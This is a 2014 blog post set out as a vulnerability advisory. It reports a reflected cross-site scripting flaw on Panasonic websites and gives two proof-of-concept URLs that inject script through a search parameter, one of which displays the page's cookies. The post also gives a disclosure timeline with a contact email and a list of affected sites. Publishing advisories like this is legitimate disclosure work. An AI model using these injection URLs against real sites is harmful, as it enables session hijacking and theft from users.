sábado, junho 21, 2014

,

XSS on Panasonic

          - XSS on Panasonic site-

*********************************************************************
Advisory: security.panasonic.com – Cross-Site Script Vulnerability (XSS)
Advisory ID:  969061
Author: Roberto Garcia (@1gbDeInfo)
Affected Software: Successfully tested on  security.panasonic.com Vendor
URL: http://security.panasonic.com
Vendor Status: reported 2 times but not solved
****************************************************************************

**************************
Vulnerability Description
**************************
The website " security.panasonic.com " is prone to a XSS vulnerability.

This vulnerability involves the ability to inject arbitrary and unauthorized
javascript code. A malicious script inserted into a page in this manner can
hijack the user’s session, submit unauthorized transactions as the user,
steal confidential information, or simply deface the page.


**************************
PoC-Exploit
**************************
http://vftr.panasonic.co.jp/en/search.x?q=data%3Atext%2Fhtml%2C%3Cscript%3Ea
lert%280%29%3C%2Fscript%3E&x=0&y=0&ie=ISO-8859-1


http://vftr.panasonic.co.jp/en/search.x?q=data%3Atext%2Fhtml%2C%3Cscript%3Ea
lert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0&ie=utf8



**************************
Solution
**************************
  Reported 2 times but not solved
**************************

Disclosure Timeline
**************************
- Report vuln Jun 4, 2014 via email to samuel.garcia@ext.eu.panasonic.com
- Reported again via web Jun 12, 2014. They answer me:

        Dear Mr. Garcia,
        Thank you for your prompt e-mail reply.
        egarding your enquiry, I am writing to confirm having forwarded your
message to the corresponding department.

        Kind Regards,
        Teo
        Customer Service Team
        Panasonic UK

**************************
Afected sites:
  - vftr.panasonic.co.jp
  - security.panasonic.com
  - panasonic.ney

*************************
Credits
**************************
----------------------------------------------------------------------------
Vulnerability found and advisory written by Roberto Garcia (@1gbDeInfo)
----------------------------------------------------------------------------

Best regards.
Roberto Garcia Amoriz
Linkedin: es.linkedin.com/in/rogaramo/
Web:  http://www.1gbdeinformacion.com
Twitter: @1gbdeinfo

0 comentários:

Postar um comentário